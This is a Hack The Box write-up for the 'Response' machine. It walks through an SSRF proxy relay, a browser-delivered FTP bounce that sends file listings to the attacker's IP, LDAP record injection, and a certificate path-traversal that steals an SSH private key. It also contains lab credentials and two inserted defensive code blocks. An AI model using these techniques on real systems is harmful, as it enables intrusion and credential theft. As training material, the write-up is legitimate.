44maker

HTB: Response

Box Info

Name: Response
Difficulty: Insane
Points: 50
Release: May 14, 2022
IP: 10.10.11.163
OS: Linux
Radar chart: image

Walkthrough

Information Gathering

Port Scan

┌──(kali㉿kali)-[~/HTB]                               
└─$ rustscan -a 10.10.11.163                                
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.           
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |         
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |       
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'               
The Modern Day Port Scanner.                                           
________________________________________                               
: https://discord.gg/GFrQsGy           :                               
: https://github.com/RustScan/RustScan :                               
 --------------------------------------                                
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan               
   
[~] The config file is expected to be at "/home/kali/.rustscan.toml"   
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers                        
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.163:22                                     
Open 10.10.11.163:80 
┌──(kali㉿kali)-[~/HTB]
└─$ nmap -sC -sV -p22,80 10.10.11.163
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-15 03:54 EST
Nmap scan report for 10.10.11.163
Host is up (0.082s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e9a4394afb065d5782fc4a0e0be46b25 (RSA)
|   256 a323e498dfb6911bf2ac2f1cc1469b15 (ECDSA)
|_  256 fb105fda55a66b953df2e85c0336ff31 (ED25519)
80/tcp open  http    nginx 1.21.6
|_http-title: Did not follow redirect to http://www.response.htb
|_http-server-header: nginx/1.21.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.44 seconds

Directory Scan

image

Port 80 serves a web page.

Run gobuster:

┌──(kali㉿kali)-[~/HTB]
└─$ gobuster dir -u http://www.response.htb -w ~/wordlist/SecLists/Discovery/Web-Content/raft-medium-directories.txt  

===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://www.response.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/kali/wordlist/SecLists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/01/15 04:02:42 Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 169] [--> http://www.response.htb/css/]
/img                  (Status: 301) [Size: 169] [--> http://www.response.htb/img/]
/assets               (Status: 301) [Size: 169] [--> http://www.response.htb/assets/]
/fonts                (Status: 301) [Size: 169] [--> http://www.response.htb/fonts/]
/status               (Status: 301) [Size: 169] [--> http://www.response.htb/status/]

There may be something under assets and status, so run it again.

assets returns 403.

image
This proxy looks like it is worth investigating.
image
image

After Base64 decoding, we get the result:

{"servers":[{"id":1,"ip":"127.0.0.1","name":"Test Server"}]}

Next, try get_chat_status from status/main.js.php.

image

We get the result {"status":"running","vhost":"chat.response.htb"}

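User Access

After obtaining chat.response.htb, the web page cannot be opened either by adding a hosts entry or by accessing it directly, so we try the earlier JSON-format configuration.

Using api.response.htb as a stepping stone: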

{"api_version":"1.0","endpoints":[{"desc":"get api status","method":"GET","route":"/"},{"desc":"get internal chat status","method":"GET","route":"/get_chat_status"},{"desc":"get monitored servers list","method":"GET","route":"/get_servers"}],"status":"running"}

Write a Python script:

import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
import random
import re
import requests
from socketserver import ThreadingMixIn
import sys
import threading
import time


hostName = "0.0.0.0"
serverPort = 80


class MyServer(BaseHTTPRequestHandler):
    def do_GET(self):
        self.request_handler('GET')

    def do_POST(self):
        self.request_handler('POST')

    def request_handler(self, method):
        self.random_number = random.randint(100000,999999)

        path = self.path
        myurl = 'http://chat.response.htb' + path
        print(f"[{self.random_number}] {method} {myurl}")
       
        if method == 'POST':
            content_len = int(self.headers.get('Content-Length'))
            post_body = self.rfile.read(content_len)
            print(f"[{self.random_number}] body: {post_body}")
        else:
            post_body = None

        digest = self.get_digest(myurl)

        data = self.send_request_to_proxy(myurl, method, digest, post_body)

        self.send_response(200)
        if path.endswith('.js'):
            self.send_header("Content-type", "application/javascript")
        elif path.endswith('.css'):
            self.send_header("Content-type", "text/css")
        else:
            self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(data)

    def get_digest(self, myurl):
        url = 'http://www.response.htb/status/main.js.php'
        cookies = {'PHPSESSID': myurl}
        response = requests.get(url, cookies=cookies)
        response.raise_for_status()
        assert 'session_digest' in response.text
        session_digest = re.search(r'\'session_digest\':\'([^\']+)', response.text).group(1)
        #print(f"[{self.random_number}] digest: {session_digest}")
        return session_digest

    def send_request_to_proxy(self, myurl, method, digest, body=None):
        url = 'http://proxy.response.htb/fetch'
        data = {'url': myurl,
                'url_digest': digest,
                'method': method,
                'session': '1a5455b829845168770cb337f1a05507',
                'session_digest': 'd27e297b494df599e72985e6e9a166751d7de74136df9d74468aac0818c29125'}
        if method == 'POST':
            # b64encode() returns bytes, which json cannot serialize; send it as str
            data['body'] = base64.b64encode(body).decode()
        response = requests.post(url, json=data)
        response.raise_for_status()
        assert 'body' in response.text and 'status_code' in response.text
        body = response.json()['body']
        status_code = response.json()['status_code']
        print(f"[{self.random_number}] status_code from proxy: {status_code}; length of body: {len(body)}")
        decoded_string = base64.b64decode(body)
        return decoded_string


# This part is for multithreading.
# See https://stackoverflow.com/questions/14088294/multithreaded-web-server-in-python
# Multithreading is necessary because a lot of requests are made when opening the chat application.
# Some requests take several seconds to complete. I don't want these requests to hold back the other ones.
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
    """Handle requests in a separate thread."""


def main():
    print("Edit your /etc/hosts like this:")
    print("10.10.11.163    www.response.htb proxy.response.htb     # HTB machine IP")
    print("10.10.16.29     chat.response.htb                       # my VPN IP")
    print("While running this script, open http://chat.response.htb/ in the web browser\n")

    # Without multithreading:
    #webServer = HTTPServer((hostName, serverPort), MyServer)
    # With multithreading (choose one or the other):
    webServer = ThreadedHTTPServer((hostName, serverPort), MyServer)

    print("Server started http://%s:%s" % (hostName, serverPort))

    try:
        webServer.serve_forever()
    except KeyboardInterrupt:
        pass

    webServer.server_close()
    print("Server stopped.")


if __name__ == "__main__":       
    main()

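Opening the web page shows:

image

After downloading, check README.md.
The configuration is in the server's index.js.

image
The username and password are `guest` and `guest`.

Chat with the remaining employee.

image
This path is a dead end. Let's look at the downloaded source code again; it contains an LDAP service.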

LDAP Service

Install

sudo apt install slapd

Configure

sudo dpkg-reconfigure slapd

Select no

Enter response.htb

organization name: response

Next, create an LDIF file:

dn: ou=users,dc=response,dc=htb
changetype: add
objectClass: organizationalPerson
sn:test
cn:test

dn: uid=admin,ou=users,dc=response,dc=htb
changetype: add
objectClass: inetOrgPerson
userPassword: password
sn: test
cn: test

Start the service:

service slapd start
ldapadd -x -D "cn=admin,dc=response,dc=htb" -w 'password' -H ldap://127.0.0.1 -f group.ldif
image

FTP

After the chat ended, we got a clue:

 (yourself)
ok
bob
awesome!
i moved the internal ftp server... the new ip address is 172.18.0.2 and it is listening on port 2121. the creds are ftp_user / Secret12345
outgoing traffic from the server is currently allowed, but i will adjust the firewall to fix that
btw. would be great if you could send me the javascript article you were talking about 

172.18.0.2 2121 ftp_user Secret12345

Create an HTML file. For why, see this article 👉 https://www.serv-u.com/resources/tutorial/pasv-response-epsv-port-pbsz-rein-ftp-command

<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", 'http://172.18.0.2:2121/',true);

xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

xhr.onreadystatechange = function() {
if (this.readyState === XMLHttpRequest.DONE &&
this.status === 200) {
    }
}
xhr.send("USER ftp_user\r\nPASS Secret12345\r\nPORT 10,10,16,29,10,15\r\nLIST\r\n");
</script>

My IP is 10,10,16,29.

10,15 means 10*256+15=2575.
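From the FTP server's side, the two things that make this request stand out are an HTTP request line arriving on the control channel and a PORT argument that names a host other than the connected client. The following is an added example, not part of the original post: it decodes the PORT argument with the arithmetic above and flags both conditions; the function names, the client address and the sample capture are constructed for illustration.

```python
import ipaddress

HTTP_METHODS = {"GET", "POST", "PUT", "HEAD", "OPTIONS", "DELETE", "PATCH"}


def parse_port_argument(arg):
    """Decode 'h1,h2,h3,h4,p1,p2' from an FTP PORT command (RFC 959)."""
    parts = [p.strip() for p in arg.split(",")]
    if len(parts) != 6:
        raise ValueError("PORT needs six comma-separated numbers")
    nums = []
    for p in parts:
        if not (p.isascii() and p.isdigit()) or int(p) > 255:
            raise ValueError(f"bad octet in PORT argument: {p!r}")
        nums.append(int(p))
    host = ".".join(str(n) for n in nums[:4])
    port = nums[4] * 256 + nums[5]  # high byte * 256 + low byte
    return host, port


def review_control_channel(peer_ip, lines):
    """Return (finding, detail) tuples for one FTP control connection."""
    peer = str(ipaddress.IPv4Address(peer_ip))
    findings = []
    for raw in lines:
        line = raw.strip()
        verb, _, arg = line.partition(" ")
        if verb.upper() in HTTP_METHODS and arg.upper().endswith(("HTTP/1.0", "HTTP/1.1")):
            # A browser, not an FTP client, opened this connection.
            findings.append(("http-request-on-ftp", line))
        elif verb.upper() == "PORT":
            try:
                host, port = parse_port_argument(arg)
            except ValueError as exc:
                findings.append(("malformed-port", str(exc)))
                continue
            if host != peer:
                # Data connection would go to a third party (FTP bounce pattern).
                findings.append(("port-host-mismatch", f"{host}:{port}"))
    return findings


# Constructed capture of what the FTP server receives when a browser
# POSTs the body shown above; the peer address is made up.
SAMPLE_PEER = "172.18.0.9"
SAMPLE_LINES = [
    "POST / HTTP/1.1",
    "Host: 172.18.0.2:2121",
    "Content-Type: application/x-www-form-urlencoded",
    "",
    "USER ftp_user",
    "PASS (redacted)",
    "PORT 10,10,16,29,10,15",
    "LIST",
]

if __name__ == "__main__":
    for finding in review_control_channel(SAMPLE_PEER, SAMPLE_LINES):
        print(finding)
```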

Then run:

python3 -m http.server 9001
nc -lvnp 2575

Earlier, bob said he had business with admin, so we send him the link (the HTML file above is named 1.html):

http://<my-ip>:9001/1.html
┌──(kali㉿kali)-[~/HTB]
└─$ nc -lvnp 2575
listening on [any] 2575 ...
connect to [10.10.16.29] from (UNKNOWN) [10.10.11.163] 39036
-rw-r--r--    1 root     root            74 Mar 16  2022 creds.txt

We found the credentials.

Now modify the code above slightly:

<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", 'http://172.18.0.2:2121/',true);

xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

xhr.onreadystatechange = function() {
if (this.readyState === XMLHttpRequest.DONE &&
this.status === 200) {
    }
}
xhr.send("USER ftp_user\r\nPASS Secret12345\r\nPORT 10,10,16,29,10,15\r\nRETR creds.txt\r\n");
</script>

We get the result:

ftp
---
ftp_user / Secret12345

ssh
---
bob / F6uXVwEjdZ46fsbXDmQK7YPY3OM

Try ssh.

🎉🎉🎉

┌──(kali㉿kali)-[~/HTB]    
└─$ ssh [email protected]   
The authenticity of host '10.10.11.163 (10.10.11.163)' can't be established.                   
ED25519 key fingerprint is SHA256:iPHy1XV7afTauFvMhysv/Ynl8yV39A02ZsTLR42/sd0.                 
This key is not known by any other names.                              
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes                       
Warning: Permanently added '10.10.11.163' (ED25519) to the list of known hosts.                
[email protected]'s password:                                           
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-109-generic x86_64)            
  System load:                      1.69
  Usage of /:                       79.2% of 8.54GB
  Memory usage:                     29%       
  Swap usage:                       0%        
  Processes:                        287       
  Users logged in:                  0           
  IPv4 address for br-01fdb3f286b8: 172.19.0.1                   
  IPv4 address for br-feb0146a542b: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.10.11.163
  IPv6 address for eth0:            dead:beef::250:56ff:feb9:76ed

Last login: Sun Jan 15 04:14:32 2023 from 10.10.14.10
bob@response:~$ ls
user.txt
bob@response:~$ cat user.txt
cd**************************954

Lateral Movement

Looking around, there is nothing to work with other than the user scryh.

Enter the directory:

bob@response:/home/scryh$ ls -liah
total 40K
532257 drwxr-xr-x 7 scryh scryh 4.0K Mar 11  2022 .
524290 drwxr-xr-x 4 root  root  4.0K Mar  4  2022 ..
532271 lrwxrwxrwx 1 root  root     9 Mar  4  2022 .bash_history -> /dev/null
532260 -rw-r--r-- 1 scryh scryh  220 Feb 25  2020 .bash_logout
532259 -rw-r--r-- 1 scryh scryh 3.7K Feb 25  2020 .bashrc
532263 drwx------ 3 scryh scryh 4.0K Mar  4  2022 .cache
565333 drwx------ 3 scryh scryh 4.0K Mar  11  2022 .config
173010 drwx------ 2 scryh scryh 4.0K Mar  16  2022 incident_2022-3-042
532258 -rw-r--r-- 1 scryh scryh  807 Feb 25  2020 .profile
173019 drwxr-xr-x 5 scryh scryh 4.0K Mar 17  2022 scan
532261 drwx------ 2 scryh scryh 4.0K Mar  10  2022 .ssh

We have no access to incident, but let's look at scan.

bob@response:/home/scryh/scan$ ls -liah
total 28K
173019 drwxr-xr-x 5 scryh scryh 4.0K Mar 17  2022 .
532257 drwxr-xr-x 7 scryh scryh 4.0K Mar 11  2022 ..
173020 drwxr-xr-x 4 scryh scryh 4.0K Mar  3  2022 data
173289 drwxr-xr-x 2 scryh scryh 4.0K Jan 15 12:23 output
156892 -rwxr-xr-x 1 scryh scryh 3.4K Mar  4  2022 scan.sh
173291 drwxr-xr-x 2 scryh scryh 4.0K Feb 15  2022 scripts
156894 -rwxr-xr-x 1 scryh scryh 1.3K Mar 17  2022 send_report.py

scripts contains three nmap scripts.

bob@response:/home/scryh/scan/scripts$ ls -liah
total 68K
173291 drwxr-xr-x 2 scryh scryh 4.0K Feb 15  2022 .
173019 drwxr-xr-x 5 scryh scryh 4.0K Mar 17  2022 ..
173292 -rw-r--r-- 1 scryh scryh 9.5K Mar  3  2022 ssl-cert.nse
173293 -rw-r--r-- 1 scryh scryh  39K Feb 15  2022 ssl-enum-ciphers.nse
173294 -rw-r--r-- 1 scryh scryh 7.6K Feb 15  2022 ssl-heartbleed.nse

The next focus is understanding the three nmap scripts. We may be able to change 172.18.0.3 to our own address; then we can see what is in the xml and pdf.

local NON_VERBOSE_FIELDS = { "commonName", "organizationName",       
"stateOrProvinceName", "countryName" }                
-- Test to see if the string is UTF-16 and transcode it if possible          
local function maybe_decode(str)                                         
  -- If length is not even, then return as-is                       
  if #str < 2 or #str % 2 == 1 then                              
    return str   
  end          
  if str:byte(1) > 0 and str:byte(2) == 0 then              
    -- little-endian UTF-16                              
    return unicode.transcode(str, unicode.utf16_dec, unicode.utf8_enc, false, nil)
  elseif str:byte(1) == 0 and str:byte(2) > 0 then
    -- big-endian UTF-16
    return unicode.transcode(str, unicode.utf16_dec, unicode.utf8_enc, true, nil)
  else
    return str
  end
end

There are four parameters, each with a number of names, which can be seen in the data folder.

bob@response:/home/scryh/scan/data/countryName$ ls
AD  AN  AW  BF  BN  BW  CG  CO  CY  DZ  ET  GA  GI  GS  HN  IM  JE  KI  KZ  LS  MD  MM  MT  NA  NO  PE  PN  RE  SC  SK  ST  TF  TN  UA  VC  WS
AE  AO  AX  BG  BO  BY  CH  CR  CZ  EC  FI  GB  GL  GT  HR  IN  JM  KM  LA  LT  ME  MN  MU  NC  NP  PF  PR  RO  SD  SL  SV  TG  TO  UG  VE  XK
AF  AQ  AZ  BH  BQ  BZ  CI  CS  DE  EE  FJ  GD  GM  GU  HT  IO  JO  KN  LB  LU  MF  MO  MV  NE  NR  PG  PS  RS  SE  SM  SX  TH  TR  UM  VG  YE
AG  AR  BA  BI  BR  CA  CK  CU  DJ  EG  FK  GE  GN  GW  HU  IQ  JP  KP  LC  LV  MG  MP  MW  NF  NU  PH  PT  RU  SG  SN  SY  TJ  TT  US  VI  YT
AI  AS  BB  BJ  BS  CC  CL  CV  DK  EH  FM  GF  GP  GY  ID  IR  KE  KR  LI  LY  MH  MQ  MX  NG  NZ  PK  PW  RW  SH  SO  SZ  TK  TV  UY  VN  ZA
AL  AT  BD  BL  BT  CD  CM  CW  DM  ER  FO  GG  GQ  HK  IE  IS  KG  KW  LK  MA  MK  MR  MY  NI  OM  PL  PY  SA  SI  SR  TC  TL  TW  UZ  VU  ZM
AM  AU  BE  BM  BV  CF  CN  CX  DO  ES  FR  GH  GR  HM  IL  IT  KH  KY  LR  MC  ML  MS  MZ  NL  PA  PM  QA  SB  SJ  SS  TD  TM  TZ  VA  WF  ZW

The content of stateOrProvinceName can be relatively long, so we can construct ../../../../.ssh/id_rsa.
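The weakness here is a certificate subject field, which the scanned host fully controls, being used as a file name. The following is an added example, not code from the box or the original post: it assumes a lookup of the form data/<field>/<value> (suggested by the data/countryName listing) and contrasts an unchecked join with a validated one; all function names and the temporary directory layout are hypothetical.

```python
import os
import re
import tempfile

# Assumption: the scanner maps a certificate field to <data_dir>/<field>/<value>.
ALLOWED_FIELDS = {"commonName", "organizationName",
                  "stateOrProvinceName", "countryName"}
# One path component only: starts with a letter or digit, no separators.
SAFE_VALUE = re.compile(r"[A-Za-z0-9][A-Za-z0-9 ._-]{0,63}")


def unsafe_lookup_path(data_dir, field, value):
    """The pattern at risk: the certificate value is joined in unchecked."""
    return os.path.join(data_dir, field, value)


def safe_lookup_path(data_dir, field, value):
    """Return the lookup path, or raise ValueError for a hostile value."""
    if field not in ALLOWED_FIELDS:
        raise ValueError(f"unexpected field: {field!r}")
    if not SAFE_VALUE.fullmatch(value):
        raise ValueError(f"rejected {field} value: {value!r}")
    base = os.path.realpath(os.path.join(data_dir, field))
    candidate = os.path.realpath(os.path.join(base, value))
    # Second line of defence: also catches symlinks that point outside base.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"{field} value escapes {base}")
    return candidate


def demo():
    """Build a constructed home directory and compare both lookups."""
    with tempfile.TemporaryDirectory() as tmp:
        home = os.path.realpath(tmp)
        data_dir = os.path.join(home, "scan", "data")
        for field in ("stateOrProvinceName", "countryName"):
            os.makedirs(os.path.join(data_dir, field))
        os.makedirs(os.path.join(home, ".ssh"))
        key = os.path.join(home, ".ssh", "id_rsa")
        with open(key, "w") as fh:
            fh.write("constructed placeholder, not a real key\n")
        with open(os.path.join(data_dir, "countryName", "AU"), "w") as fh:
            fh.write("Australia\n")

        hostile = "../../../.ssh/id_rsa"  # three levels up from data/<field>
        unsafe = unsafe_lookup_path(data_dir, "stateOrProvinceName", hostile)
        escaped = os.path.realpath(unsafe) == key
        try:
            safe_lookup_path(data_dir, "stateOrProvinceName", hostile)
            blocked = False
        except ValueError:
            blocked = True
        benign = safe_lookup_path(data_dir, "countryName", "AU")
        benign_ok = benign == os.path.join(data_dir, "countryName", "AU")
        return escaped, blocked, benign_ok


if __name__ == "__main__":
    print(demo())
```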

Let's look at output.

bob@response:/home/scryh/scan/output$ cat log.txt 
scanning server ip 172.18.0.3
- retrieved manager uid: marie
- manager mail address: [email protected]
- failed to retrieve SMTP server for domain "response-test.htb" locally
- retrieved SMTP server for domain "response-test.htb": mail.response-test.htb.
- retrieved ip address of SMTP server: 172.18.0.3
- sending report output/scan_172.18.0.3.pdf to customer [email protected] via SMTP server 172.18.0.3

Run pspy:

2023/01/21 08:31:01 CMD: UID=0    PID=34603  | sudo -u scryh bash -c cd /home/scryh/scan;./scan.sh          
2023/01/21 08:31:01 CMD: UID=1000 PID=34605  | /bin/bash ./scan.sh                      
2023/01/21 08:31:01 CMD: UID=1000 PID=34604  | bash -c cd /home/scryh/scan;./scan.sh    
2023/01/21 08:31:01 CMD: UID=1000 PID=34611  | grep ipHostNumber         
2023/01/21 08:31:01 CMD: UID=1000 PID=34610  | /bin/bash ./scan.sh     
2023/01/21 08:31:01 CMD: UID=1000 PID=34612  | cut -d   -f2         
2023/01/21 08:31:01 CMD: UID=1000 PID=34613  | nmap -v -Pn 172.18.0.3 -p 443 --script scripts/ssl-enum-ciphers,scripts/ssl-cert,scripts/ssl-heartbleed -oX output/scan_172.18.0.3.xml      
2023/01/21 08:31:14 CMD: UID=1000 PID=34614  | wkhtmltopdf output/scan_172.18.0.3.xml output/scan_172.18.0.3.pdf 
2023/01/21 08:34:15 CMD: UID=1000 PID=34852  | /usr/bin/ldapsearch -x -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -s sub -b  ou=customers,dc=response,dc=htb (uid=marie) 
2023/01/21 08:35:15 CMD: UID=1000 PID=34959  | /usr/bin/env python3 ./send_report.py 172.18.0.3 [email protected] output/scan_172.18.0.3.pdf 
2023/01/21 08:35:15 CMD: UID=0    PID=34960  | /bin/bash /root/ldap/restore_ldap.sh 
2023/01/21 08:35:15 CMD: UID=0    PID=34961  | cp /root/ldap/data.mdb /root/docker/openldap/data/slapd/database/ 
2023/01/21 08:35:15 CMD: UID=0    PID=34962  | docker inspect -f {{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}} testserver 
2023/01/21 08:35:15 CMD: UID=0    PID=34968  | ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f /root/ldap/testserver.ldif 
2023/01/21 08:37:15 CMD: UID=1000 PID=35100  | python3 ./send_report.py 172.18.0.3 [email protected] output/scan_172.18.0.3.pdf 
2023/01/21 08:37:15 CMD: UID=0    PID=35101  | /bin/bash /root/ldap/restore_ldap.sh 
2023/01/21 08:37:15 CMD: UID=0    PID=35102  | cp /root/ldap/data.mdb /root/docker/openldap/data/slapd/database/ 
2023/01/21 08:37:15 CMD: UID=0    PID=35103  | docker inspect -f {{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}} testserver 
2023/01/21 08:37:15 CMD: UID=0    PID=35109  | ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f /root/ldap/testserver.ldif 

Run the command; don't forget to fill in the variables.

bob@response:/home/scryh/scan$ bind_dn='cn=admin,dc=response,dc=htb'
bob@response:/home/scryh/scan$ pwd='aU4EZxEAOnimLNzk3'
bob@response:/home/scryh/scan$ /usr/bin/ldapsearch -x -D $bind_dn -w $pwd -s sub -b 'ou=servers,dc=response,dc=htb' '(objectclass=ipHost)'|grep ipHostNumber|cut -d ' ' -f2  # this command is part of scan.sh
172.18.0.3
bob@response:/home/scryh/scan/scripts$  /usr/bin/ldapsearch -x -D $bind_dn -w $pwd -s sub -b 'ou=servers,dc=response,dc=htb' '(objectclass=ipHost)'
# extended LDIF
#
# LDAPv3
# base <ou=servers,dc=response,dc=htb> with scope subtree
# filter: (objectclass=ipHost)
# requesting: ALL
#

# TestServer, servers, response.htb
dn: cn=TestServer,ou=servers,dc=response,dc=htb
objectClass: top
objectClass: ipHost
objectClass: device
cn: TestServer
manager: uid=marie,ou=customers,dc=response,dc=htb
ipHostNumber: 172.18.0.3

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

This confirms that the host being scanned is 172.18.0.3.

The "# TestServer, servers, response.htb" part needs attention when forging the service.

Start forging:

bob@response:~$ vim server.ldif

dn: cn=TestServer2,ou=servers,dc=response,dc=htb                           
changetype: add                 
objectClass: top                    
objectClass: ipHost            
objectClass: device                 
cn: TestServer2               
manager: uid=kali,ou=customers,dc=response,dc=htb                           
ipHostNumber: 10.10.14.78

Add the service:

ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f server.ldif 

Also, as the pspy output shows, ipHost is reset frequently, so

we have to write a script that runs periodically:

#!/bin/bash
while [ 1 -eq 1 ]; do
        ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f server.ldif
        sleep 3
done

chmod +x test.sh
./test.sh &

Checking, we see:

2023/01/21 10:42:14 CMD: UID=1000 PID=44453  | nmap -v -Pn 10.10.14.78 -p 443 --script scripts/ssl-enum-ciphers,scripts/ssl-cert,scripts/ssl-heartbleed -oX output/scan_10.10.14.78.xml      

nmap is already scanning.

Next, add the mail delivery information.

Check the format:

bob@response:~$ /usr/bin/ldapsearch -x -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -s sub -b  ou=customers,dc=response,dc=htb '(uid=marie)' 
# extended LDIF
#
# LDAPv3
# base <ou=customers,dc=response,dc=htb> with scope subtree
# filter: (uid=marie)
# requesting: ALL
#

# marie, customers, response.htb
dn: uid=marie,ou=customers,dc=response,dc=htb
objectClass: inetOrgPerson
cn: Marie Wiliams
sn: Marie
uid: marie
mail: [email protected]

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

vim adduser.ldif

dn: uid=kali,ou=customers,dc=response,dc=htb
changetype: add
objectClass: inetOrgPerson
cn: Marie Wiliams
sn: Marie
uid: kali
mail: [email protected]

ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f adduser.ldif

Check whether it was written:

bob@response:~$ ldapsearch -x -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -s sub -b  ou=customers,dc=response,dc=htb '(uid=kali)'
# extended LDIF
#
# LDAPv3
# base <ou=customers,dc=response,dc=htb> with scope subtree
# filter: (uid=kali)
# requesting: ALL
#

# kali, customers, response.htb
dn: uid=kali,ou=customers,dc=response,dc=htb
objectClass: inetOrgPerson
cn: Marie Wiliams
sn: Marie
uid: kali
mail: [email protected]

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

After that, we need to stand up our own HTTPS service.

Generate the certificate:

┌──(kali㉿kali)-[~/HTB/Response]
└─$ openssl genrsa -out server.key 4096
        
┌──(kali㉿kali)-[~/HTB/Response]
└─$ openssl req -new -key server.key -out server.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:AU
State or Province Name (full name) [Some-State]:../../../.ssh/id_rsa
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:10.10.14.78
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
        
┌──(kali㉿kali)-[~/HTB/Response]
└─$ openssl x509 -req -in server.csr -out server.crt -signkey server.key -days 3650  
Certificate request self-signature ok    
subject=C = AU, ST = ../../../.ssh/id_rsa, O = Internet Widgits Pty Ltd, CN = 10.10.14.78                    
┌──(kali㉿kali)-[~/HTB/Response]             
└─$ cat server.key >> server.crt                               

Create https.py:

https.py

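import http.server, ssl
server_address = ('10.10.14.78', 443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
# ssl.wrap_socket() was removed in Python 3.12; use an SSLContext instead
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# server.crt also holds the private key (appended with cat above)
context.load_cert_chain(certfile='server.crt')
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()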

Setting Up the DNS Service

sudo docker run -d\
    --name dnsmasq \
    --restart always \
    -p 10.10.14.78:53:53/udp \
    -p 10.10.14.78:8080:8080 \
    -v /root/dnsmasq.conf:/etc/dnsmasq.conf \
    --log-opt "max-size=100m" \
    -e "HTTP_USER=admin" \
    -e "HTTP_PASS=admin" \
    jpillora/dnsmasq

Edit dnsmasq.conf:

log-queries
no-resolv
server=1.0.0.1
server=1.1.1.1
strict-order
server=/company/10.0.0.1
address=/response-test.htb/10.10.14.78
address=/mail.response-test.htb/10.10.14.78
localmx
mx-host=response-test.htb,mail.response-test.htb,50

Setting Up the SMTP Service

git clone https://github.com/ankraft/smtpproxy.git
cd smtpproxy 
mv smtpproxy.ini.example smtpproxy.ini
# edit smtpproxy.ini
[config]
port=25
sleeptime=30
waitafterpop=5
debuglevel=0
deleteonerror=true

[logging]
file=smtpproxy.log
size=1000000
count=10
level=INFO

[[email protected]]
localhostname=response-test.htb
smtphost=10.10.14.78
smtpsecurity=tls
smtpusername=username
smtppassword=password
popbeforesmtp=true
pophost=pop.example.com
popport=995
popssl=true
popusername=username
poppassword=password
popcheckdelay=60
returnpath=[email protected]

[[email protected]>]
use=[email protected]

The PDF is already being sent:

2023/01/21 11:56:12 CMD: UID=1000 PID=53947  | python3 ./send_report.py 172.18.0.3 [email protected] output/scan_172.18.0.3.pdf

python https.py

python2 smtpproxy.py

┌──(root㉿kali)-[~/smtpproxy/msgs]
└─# ls -liah
total 68K
2228303 drwxr-xr-x 2 root root 4.0K Jan 21 07:12 .
2228234 drwxr-xr-x 5 root root 4.0K Jan 21 07:08 ..
2228308 -rw------- 1 root root  60K Jan 21 07:12 tmpbx7ve7.msg

The message was received (those with trypophobia, please don't look 🙈)
